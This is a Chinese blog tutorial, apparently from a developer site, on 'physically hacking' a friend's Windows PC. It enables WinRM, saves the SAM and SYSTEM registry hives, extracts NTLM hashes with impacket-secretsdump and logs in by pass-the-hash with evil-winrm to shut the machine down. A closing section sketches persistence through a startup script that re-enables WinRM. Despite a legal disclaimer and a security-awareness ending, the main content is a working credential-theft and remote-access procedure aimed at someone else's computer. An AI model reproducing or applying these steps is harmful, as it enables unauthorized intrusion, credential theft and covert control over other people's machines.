物理hack

One_Blanks2024-11-17 17:54

声明

声明
文章只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。

✍🏻作者简介:致力于网络安全领域,目前作为一名学习者 ,很荣幸成为一名分享者 ,最终目标是成为一名开拓者 ,很有趣也十分有意义

🤵‍♂️ 个人主页: @One_Blanks

欢迎评论 💬点赞👍🏻 收藏 📂加关注+

目录

    • 声明
    • 前期准备
    • 操作开始
      • 一、来到目标主机前(当然需要电脑开着屏幕)
        • [1. 使用管理员身份运行PowerShell](#1. 使用管理员身份运行PowerShell)
        • [2. 开启WinRM 服务(远程控制服务)](#2. 开启WinRM 服务(远程控制服务))
        • [3. 用管理员身份打开CMD命令行](#3. 用管理员身份打开CMD命令行)
        • [4. 获取内网IP与敏感信息文件](#4. 获取内网IP与敏感信息文件)
      • 二、回到自己的电脑打开kali(如果没有关注公众号自取,内有镜像源)
        • [1. 将拿到的文件放到kali,并进入到当前目录](#1. 将拿到的文件放到kali,并进入到当前目录)
        • [2. 先看一下内网IP(我这里是192.168.3.24)](#2. 先看一下内网IP(我这里是192.168.3.24))
        • [3. 使用impacket-secretsdump工具对注册表进行密码解析](#3. 使用impacket-secretsdump工具对注册表进行密码解析)
        • [4. 使用evil-winrm工具进行连接](#4. 使用evil-winrm工具进行连接)
        • [5. 成功连接](#5. 成功连接)
    • 三、扩展
    • 总结

前期准备

数据传输:我们需要一个U盘存储几个文件,或者直接用社交聊天软件发给自己也行

操作环境:另外还需要kali Linux系统,要使用到里面evil-winrm工具、impacket工具

网络环境:需要和被控制的主机处于一个局域网下(就是连同一个WIFI)

公众号中有精心整理的资料工具,需要自取

操作开始

一、来到目标主机前(当然需要电脑开着屏幕)

1. 使用管理员身份运行PowerShell
2. 开启WinRM 服务(远程控制服务)
  • 先在WIFI属性中将公用网络配置为专用网络(否则无法开启服务)
  • 在PowerShell中使用命令开启WinRM服务
cmd 复制代码 
enable-psremoting
3. 用管理员身份打开CMD命令行
4. 获取内网IP与敏感信息文件
  • 到C盘的根目录,方便拿文件
cmd 复制代码 
cd \
  • 获取IP
cmd 复制代码 
ipconfig >ip.txt
  • 获取注册表敏感信息
cmd 复制代码 
reg save HKLM\SAM sam.save
cmd 复制代码 
reg save HKLM\SYSTEM system.save
  • 将这三个文件拿到手就可以偷偷撤走了(趁朋友还没发现)

二、回到自己的电脑打开kali(如果没有关注公众号自取,内有镜像源)

1. 将拿到的文件放到kali,并进入到当前目录
2. 先看一下内网IP(我这里是192.168.3.24)
bash 复制代码 
cat ip.txt
3. 使用impacket-secretsdump工具对注册表进行密码解析
  • 如果没有impacket工具要先安装
bash 复制代码 
git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
python3 -m pip install .  
python3 setup.py install
  • 解析敏感文件
bash 复制代码 
impacket-secretsdump -sam sam.save -system system.save LOCAL

直接解析出来了,记录使用第二个哈希密码(中间用冒号 : 隔开了)

4. 使用evil-winrm工具进行连接
  • 安装
bash 复制代码 
sudo apt install evil-winrm
  • 连接
bash 复制代码 
evil-winrm -i 192.168.3.24 -u 28374 -H 064298325933c9178c0588c0fd2f1b47

-i 选项后面是目标IP

-u 选项后面是目标用户

-H 选项后面是目标用户的哈希密码

5. 成功连接
  • 十秒关机命令: shutdown -s -t 10

这个时候就可以玩了,你可以和你的朋友说:我数十个数你电脑就会关机你信不信。

十秒后当然也是成功可以装到。

三、扩展

我们经过这一系列操作也是成功拿到它的电脑的权限,但是如果开启的服务被发现了然后被关闭了怎么办,那样就直接失去了对这台主机的控制,所以我们可以去写一个bat批命令处理脚本,加入一系列的reg注册表命令,添加到主机自启动中去,并写一个判断逻辑,查询WinRM服务启动状态,如果关闭,那就修改注册表给它开启,这样就可以持续获得这台主机的权限。

当然了,这只是一个思路,实现就由你们去做吧

总结

这篇文章不仅仅教会大家这些网络技术,更是想提高大家的安全意识,即使电脑就放在那里也是会被人进行操作的,要养成电脑常锁屏的好习惯,最大的安全漏洞不在系统,在于人类。提高个人网络安全意识,也是在提高国家的网络安全。

相关推荐
泥土编程1 小时前
linux服务器配置大全
linux·运维·服务器·华为
姚永强1 小时前
第三次作业
linux·运维·服务器
Be_insighted1 小时前
从dos上传shell脚本文件到Linux、麒麟执行报错“/bin/bash^M:解释器错误:没有那个文件或目录”
linux·运维·服务器
最后一个bug2 小时前
lua调用C语言函数,在函数中进行类型检查
linux·c语言·开发语言·lua
猫猫的小茶馆2 小时前
【网络编程】字节序:大端序和小端序
linux·c语言·驱动开发·计算机网络·嵌入式软件
诸葛悠闲2 小时前
《操作系统 - 清华大学》3 -3:连续内存分配:内存碎片与分区的动态分配
linux
运维佬3 小时前
在 Linux 系统上部署 Oracle 数据库涉及多个步骤
linux·数据库·oracle
勤奋的凯尔森同学3 小时前
Ubuntu24.04配置安装可视化terminal终端
linux·ssh·可视化命令行终端
一般清意味……3 小时前
Linux基础开发工具使用
linux·git·vim·yum·gcc/g++/gdb
热门推荐
01RAG 实践- Ollama+RagFlow 部署本地知识库02Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO03【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总04聊聊 Python 中的同步原语,为什么有了 GIL 还需要同步原语05全面解析:构建基于深度学习的安全帽检测系统(UI界面+YOLO代码+数据集)06组基轨迹建模 GBTM的介绍与实现(Stata 或 R)07ChatGPT + Stable Diffusion + 百度AI + MoviePy 实现文字生成视频,小说转视频,自媒体神器!(二)08文件或文件夹名称中有空格如何批量去除09基于YOLOv10深度学习的CT扫描图像肾结石智能检测系统【python源码+Pyqt5界面+数据集+训练代码】深度学习实战、目标检测10好数(蓝桥杯)